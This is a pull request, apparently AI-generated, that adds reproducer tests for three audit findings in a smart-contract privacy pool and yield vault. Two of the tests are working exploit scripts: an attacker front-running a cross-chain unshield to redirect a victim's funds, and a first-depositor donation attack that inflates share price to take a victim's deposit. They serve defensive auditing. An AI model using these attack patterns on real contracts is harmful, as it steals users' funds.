### PR TITLE
test: reproducers for cross-chain unshield theft, yield inflation, and merkle rollover desync

### DIFF
--- a/test-foundry/RolloverDesyncPoC.t.sol
+++ b/test-foundry/RolloverDesyncPoC.t.sol
@@ -1,0 +1,111 @@
+// ABOUTME: PoC for the tree-rollover event desync — router's getInsertionTreeNumberAndStartingIndex
+// ABOUTME: drops the rollover branch, so Shield/Transact events report the wrong position at a tree boundary.
+
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.17;
+
+import "forge-std/Test.sol";
+import "forge-std/console2.sol";
+import "../contracts/privacy-pool/PrivacyPool.sol";
+import "../contracts/privacy-pool/modules/MerkleModule.sol";
+import "../contracts/privacy-pool/storage/PrivacyPoolStorage.sol";
+
+/// @dev Minimal harness that shares PrivacyPoolStorage's layout so we can exercise the REAL
+///      MerkleModule.getInsertionTreeNumberAndStartingIndex (the correct, rollover-aware version)
+///      via delegatecall for an identical tree state.
+contract MerkleProbe is PrivacyPoolStorage {
+    function setTreeState(uint256 _treeNumber, uint256 _nextLeafIndex) external {
+        treeNumber = _treeNumber;
+        nextLeafIndex = _nextLeafIndex;
+    }
+
+    function callModule(address module, uint256 count) external returns (uint256 treeNum, uint256 startIndex) {
+        (bool ok, bytes memory ret) = module.delegatecall(
+            abi.encodeWithSignature("getInsertionTreeNumberAndStartingIndex(uint256)", count)
+        );
+        require(ok, "delegatecall failed");
+        return abi.decode(ret, (uint256, uint256));
+    }
+}
+
+/// @title RolloverDesyncPoC — proves the router and the module disagree at a tree boundary.
+/// @dev The router (`PrivacyPool.getInsertionTreeNumberAndStartingIndex`, PrivacyPool.sol:444) ignores
+///      its argument and always returns `(treeNumber, nextLeafIndex)`. The module version
+///      (`MerkleModule.sol:166`) correctly returns `(treeNumber + 1, 0)` when the batch overflows the
+///      current tree — but it is dead code, because modules call this via `IMerkleModule(address(this))`,
+///      which resolves to the router's own function. `insertLeaves` DOES roll the tree over, so the
+///      Shield/Transact event position emitted for a boundary-crossing batch points at the wrong tree/index,
+///      and off-chain wallets can never build a valid spend proof for those notes.
+contract RolloverDesyncPoC is Test {
+    uint256 constant TREE_DEPTH = 16;
+    uint256 constant MAX_LEAVES = 2 ** TREE_DEPTH; // 65536
+
+    PrivacyPool pool;
+    MerkleModule merkleModule;
+    MerkleProbe probe;
+
+    // Storage slots (from `forge inspect PrivacyPool storage-layout`)
+    uint256 constant SLOT_NEXT_LEAF_INDEX = 14;
+    uint256 constant SLOT_TREE_NUMBER = 17;
+
+    function setUp() public {
+        pool = new PrivacyPool();
+        merkleModule = new MerkleModule();
+        probe = new MerkleProbe();
+    }
+
+    function test_routerAndModuleDisagreeAtTreeBoundary() public {
+        uint256 currentTree = 3;
+        uint256 nearFull = MAX_LEAVES - 1; // 65535: only one slot left in the current tree
+        uint256 batch = 10; // inserting 10 leaves overflows the current tree
+
+        // Drive the REAL router to the boundary.
+        vm.store(address(pool), bytes32(SLOT_NEXT_LEAF_INDEX), bytes32(nearFull));
+        vm.store(address(pool), bytes32(SLOT_TREE_NUMBER), bytes32(currentTree));
+        assertEq(pool.nextLeafIndex(), nearFull, "router nextLeafIndex set");
+        assertEq(pool.treeNumber(), currentTree, "router treeNumber set");
+
+        // What the router reports (this is what gets emitted in the Shield/Transact event).
+        (uint256 routerTree, uint256 routerIndex) = pool.getInsertionTreeNumberAndStartingIndex(batch);
+        console2.log("router says  -> tree:", routerTree, "index:", routerIndex);
+
+        // What the module (and the actual insertLeaves rollover) does for the same state.
+        probe.setTreeState(currentTree, nearFull);
+        (uint256 moduleTree, uint256 moduleIndex) = probe.callModule(address(merkleModule), batch);
+        console2.log("module says  -> tree:", moduleTree, "index:", moduleIndex);
+
+        // Router ignores the overflow and returns the stale pre-rollover position.
+        assertEq(routerTree, currentTree, "router returns stale tree number");
+        assertEq(routerIndex, nearFull, "router returns stale leaf index");
+
+        // Module correctly rolls over to the next tree at index 0 — this is where insertLeaves
+        // actually places the leaves.
+        assertEq(moduleTree, currentTree + 1, "module rolls to next tree");
+        assertEq(moduleIndex, 0, "module starts new tree at index 0");
+
+        // The desync: the emitted event position does NOT match the real insertion position.
+        assertTrue(
+            routerTree != moduleTree || routerIndex != moduleIndex,
+            "expected router/module disagreement at boundary"
+        );
+        console2.log("DESYNC CONFIRMED: boundary-crossing batch is emitted at the wrong tree/index");
+    }
+
+    /// @dev Away from a boundary, the two agree — confirming the bug is specifically the missing
+    ///      rollover branch, not a general mismatch.
+    function test_routerAndModuleAgreeAwayFromBoundary() public {
+        uint256 currentTree = 3;
+        uint256 index = 1000;
+        uint256 batch = 10;
+
+        vm.store(address(pool), bytes32(SLOT_NEXT_LEAF_INDEX), bytes32(index));
+        vm.store(address(pool), bytes32(SLOT_TREE_NUMBER), bytes32(currentTree));
+
+        (uint256 routerTree, uint256 routerIndex) = pool.getInsertionTreeNumberAndStartingIndex(batch);
+        probe.setTreeState(currentTree, index);
+        (uint256 moduleTree, uint256 moduleIndex) = probe.callModule(address(merkleModule), batch);
+
+        assertEq(routerTree, moduleTree, "trees agree away from boundary");
+        assertEq(routerIndex, moduleIndex, "indices agree away from boundary");
+    }
+}

--- a/test-foundry/YieldInflationPoC.t.sol
+++ b/test-foundry/YieldInflationPoC.t.sol
@@ -1,0 +1,102 @@
+// ABOUTME: PoC for #365 — ArmadaYieldVault first-depositor share-inflation attack.
+// ABOUTME: Attacker inflates share price via a direct spoke donation, then steals a victim's principal.
+
+// SPDX-License-Identifier: MIT
+pragma solidity ^0.8.17;
+
+import "forge-std/Test.sol";
+import "forge-std/console2.sol";
+import "../contracts/yield/ArmadaYieldVault.sol";
+import "../contracts/governance/ArmadaTreasuryGov.sol";
+import "../contracts/aave-mock/MockAaveSpoke.sol";
+import "../contracts/cctp/MockUSDCV2.sol";
+
+/// @title YieldInflationPoC — demonstrates the #365 inflation attack end to end.
+/// @dev Root cause: `deposit`/`redeem` are permissionless, `totalAssets()` reads the
+///      live (externally-donatable) spoke balance, and there is no dead-shares/virtual-offset
+///      defense. An attacker who is the first depositor can inflate the share price with a
+///      direct `spoke.supply(..., address(vault))` donation and capture a later depositor's funds.
+contract YieldInflationPoC is Test {
+    ArmadaYieldVault vault;
+    MockUSDCV2 usdc;
+    MockAaveSpoke spoke;
+    ArmadaTreasuryGov treasury;
+
+    address attacker = address(0xA11CE);
+    address victim = address(0x71C71);
+
+    uint256 constant DONATION = 100_000e6; // 100k USDC donated directly into the vault's spoke position
+    uint256 constant VICTIM_DEPOSIT = 150_000e6; // victim's honest deposit
+
+    function setUp() public {
+        usdc = new MockUSDCV2("Mock USDC", "USDC");
+        spoke = new MockAaveSpoke();
+        usdc.addMinter(address(spoke));
+        spoke.addReserve(address(usdc), 500, true); // 5% APY reserve, reserveId 0
+        treasury = new ArmadaTreasuryGov(address(this));
+        vault = new ArmadaYieldVault(address(spoke), 0, address(treasury), "Armada Yield USDC", "ayUSDC");
+
+        usdc.mint(attacker, 1 + DONATION);
+        usdc.mint(victim, VICTIM_DEPOSIT);
+    }
+
+    function test_firstDepositorInflationStealsVictimPrincipal() public {
+        // ─── Step 1: attacker is the first depositor with a dust deposit ───
+        vm.startPrank(attacker);
+        usdc.approve(address(vault), 1);
+        uint256 attackerShares = vault.deposit(1, attacker);
+        vm.stopPrank();
+
+        assertEq(attackerShares, 1, "attacker should hold exactly 1 share");
+        assertEq(vault.totalSupply(), 1, "supply == 1 after dust deposit");
+        console2.log("share price after 1-wei deposit (assets per share):", vault.convertToAssets(1));
+
+        // ─── Step 2: attacker donates directly into the vault's spoke position ───
+        // MockAaveSpoke.supply credits shares to ANY onBehalfOf, so the vault's
+        // totalAssets() jumps with no corresponding vault shares minted.
+        vm.startPrank(attacker);
+        usdc.approve(address(spoke), DONATION);
+        spoke.supply(0, DONATION, address(vault));
+        vm.stopPrank();
+
+        uint256 inflatedPrice = vault.convertToAssets(1);
+        console2.log("share price after donation (assets per share):", inflatedPrice);
+        // Root cause proven: an unrelated party moved the share price from ~1 to ~90k+.
+        assertGt(inflatedPrice, DONATION / 2, "share price was inflated by an external donation");
+
+        // ─── Step 3: victim makes an honest deposit and is rounded down ───
+        vm.startPrank(victim);
+        usdc.approve(address(vault), VICTIM_DEPOSIT);
+        uint256 victimShares = vault.deposit(VICTIM_DEPOSIT, victim);
+        vm.stopPrank();
+
+        console2.log("victim deposited (USDC):     ", VICTIM_DEPOSIT);
+        console2.log("victim shares received:      ", victimShares);
+        uint256 victimClaimable = vault.convertToAssets(victimShares);
+        console2.log("victim claimable immediately:", victimClaimable);
+
+        // The victim instantly loses value: their claimable is far below what they paid in.
+        assertLt(victimClaimable, VICTIM_DEPOSIT, "victim's shares are worth less than they deposited");
+        uint256 victimLoss = VICTIM_DEPOSIT - victimClaimable;
+        console2.log("victim instant loss (USDC):  ", victimLoss);
+
+        // ─── Step 4: attacker redeems their single share and walks away with the loot ───
+        uint256 attackerUsdcBefore = usdc.balanceOf(attacker);
+        vm.prank(attacker);
+        uint256 attackerRedeemed = vault.redeem(attackerShares, attacker, attacker);
+        uint256 attackerUsdcAfter = usdc.balanceOf(attacker);
+
+        uint256 attackerCost = 1 + DONATION; // dust deposit + donation
+        console2.log("attacker total cost (USDC):  ", attackerCost);
+        console2.log("attacker redeemed (USDC):    ", attackerRedeemed);
+        assertEq(attackerUsdcAfter - attackerUsdcBefore, attackerRedeemed, "redeem paid out to attacker");
+
+        // The attack is profitable: attacker withdraws more than they put in, at the victim's expense.
+        assertGt(attackerRedeemed, attackerCost, "attacker profits from the inflation attack");
+        uint256 attackerProfit = attackerRedeemed - attackerCost;
+        console2.log("attacker net profit (USDC):  ", attackerProfit);
+
+        // The profit is drawn from the victim's deposit.
+        assertGt(victimLoss, 0, "victim funded the attacker's profit");
+    }
+}

--- a/test/privacy_pool_adversarial.ts
+++ b/test/privacy_pool_adversarial.ts
@@ -492,6 +492,61 @@ describe("Privacy Pool Adversarial", function () {
       const isSpent = await privacyPool.nullifiers(0, nullifier);
       expect(isSpent).to.be.true;
     });
+
+    // WHY: PoC for #364. The cross-chain unshield destination (`finalRecipient`) is a plaintext
+    // argument that never enters proof validation and is not committed by `hashBoundParams`, unlike
+    // the local unshield path where the recipient is derived from the proof-bound note npk. This
+    // verifies that an attacker can front-run a victim's cross-chain unshield with the identical
+    // proof and redirect the funds — a direct theft of every cross-chain exit.
+    it("PoC #364: attacker front-runs a cross-chain unshield and redirects the funds", async function () {
+      const usdcAddr = await hubUsdc.getAddress();
+      const root = await shieldAndGetRoot(ethers.parseUnits("200", 6));
+      const unshieldAmount = ethers.parseUnits("50", 6);
+      const nullifier = ethers.keccak256(ethers.toUtf8Bytes("poc364-nullifier"));
+
+      // The unshield note is bound to a specific npk via the commitment hash (a SNARK public
+      // input). Here the npk encodes the VICTIM (bob) — the note cryptographically "belongs" to bob.
+      const victimNpk = ethers.zeroPadValue(bobAddress, 32);
+      const commitHash = computeCommitmentHash(BigInt(bobAddress), BigInt(usdcAddr), BigInt(unshieldAmount));
+
+      const buildTx = () =>
+        makeTransaction({
+          merkleRoot: root,
+          nullifiers: [nullifier],
+          commitments: [commitHash],
+          unshield: 1,
+          unshieldPreimage: {
+            npk: victimNpk,
+            token: { tokenType: 0, tokenAddress: usdcAddr, tokenSubID: 0 },
+            value: unshieldAmount,
+          },
+        });
+
+      // The CrossChainUnshieldInitiated event is emitted (via delegatecall) from the pool's
+      // address using TransactModule's ABI, so decode it through a TransactModule-at-pool handle.
+      const poolAsTransact = transactModule.attach(privacyPoolAddress);
+
+      // Bob would submit this with finalRecipient = bob. But `finalRecipient` never enters proof
+      // validation, so the attacker resubmits the IDENTICAL transaction (same proof, same note,
+      // same nullifier) with finalRecipient = attacker.
+      await expect(
+        privacyPool
+          .connect(attacker)
+          .atomicCrossChainUnshield(buildTx(), DOMAINS.client, attackerAddress, ethers.ZeroHash, 0)
+      )
+        .to.emit(poolAsTransact, "CrossChainUnshieldInitiated")
+        .withArgs(DOMAINS.client, attackerAddress, unshieldAmount, 0);
+
+      // The note's npk encoded BOB, yet the CCTP burn was directed to the ATTACKER — the recipient
+      // is unbound. The nullifier is now spent, so bob's own (identical, correct) submission
+      // reverts: his funds are already gone to the attacker.
+      expect(await privacyPool.nullifiers(0, nullifier)).to.be.true;
+      await expect(
+        privacyPool
+          .connect(bob)
+          .atomicCrossChainUnshield(buildTx(), DOMAINS.client, bobAddress, ethers.ZeroHash, 0)
+      ).to.be.revertedWith("TransactModule: Note already spent");
+    });
   });
 
   // ═══════════════════════════════════════════════════════════════════


### PR DESCRIPTION
Adds failing/passing reproducer tests for three verified fund-loss findings from the contract security audit. No production code is changed — these are reproducers to pin the bugs and verify future fixes.

## PoCs

**#364 — Critical: cross-chain unshield recipient not bound to the ZK proof**
`test/privacy_pool_adversarial.ts` (added test). The unshield note's `npk` encodes the victim, but `finalRecipient` is a plaintext arg that never enters proof validation. The attacker resubmits the *identical* transaction with `finalRecipient = attacker`; it succeeds and emits `CrossChainUnshieldInitiated(client, attacker, 50e6, 0)`, the nullifier is spent, and the victim's own submission then reverts `"Note already spent"` — the exit is stolen.

**#365 — Critical: ArmadaYieldVault first-depositor inflation attack**
`test-foundry/YieldInflationPoC.t.sol`. Attacker `deposit(1)`, then donates directly into the vault's spoke position via `spoke.supply(..., vault)` (permissionless `onBehalfOf`), inflating the share price from `1` to `~90,000e6`. Victim deposits 150,000 USDC, instantly holds only 120,000; attacker turns 100,000 into 120,000 (net +20,000, victim −30,000, ~10,000 to the yield fee).

**Merkle rollover event desync (Medium→High)**
`test-foundry/RolloverDesyncPoC.t.sol`. The router's `getInsertionTreeNumberAndStartingIndex` (`PrivacyPool.sol:444`) drops the rollover branch that the real `MerkleModule` has, so at a tree boundary it returns `(tree 3, index 65535)` while `insertLeaves` actually places notes at `(tree 4, index 0)`. The two agree away from a boundary, isolating the bug. Emitting the wrong position makes those notes unspendable.

## Test results
- `forge test --match-contract "YieldInflationPoC|RolloverDesyncPoC"` → 3 passing
- `npx hardhat test test/privacy_pool_adversarial.ts` → 58 passing (incl. the new #364 PoC)

## Notes
- Fresh workspace required `npm install --legacy-peer-deps` for `forge` to resolve OZ imports; no tracked lockfile changes.
- The #364 PoC reuses the adversarial suite's Poseidon/module/dual-chain harness rather than duplicating ~120 lines of setup; labeled with a `WHY:` comment referencing the issue.
- A full Foundry PoC for #364 isn't practical (Poseidon needs bytecode injection), hence the Hardhat home.

Refs #364, #365.

🤖 Generated with [Claude Code](https://claude.com/claude-code)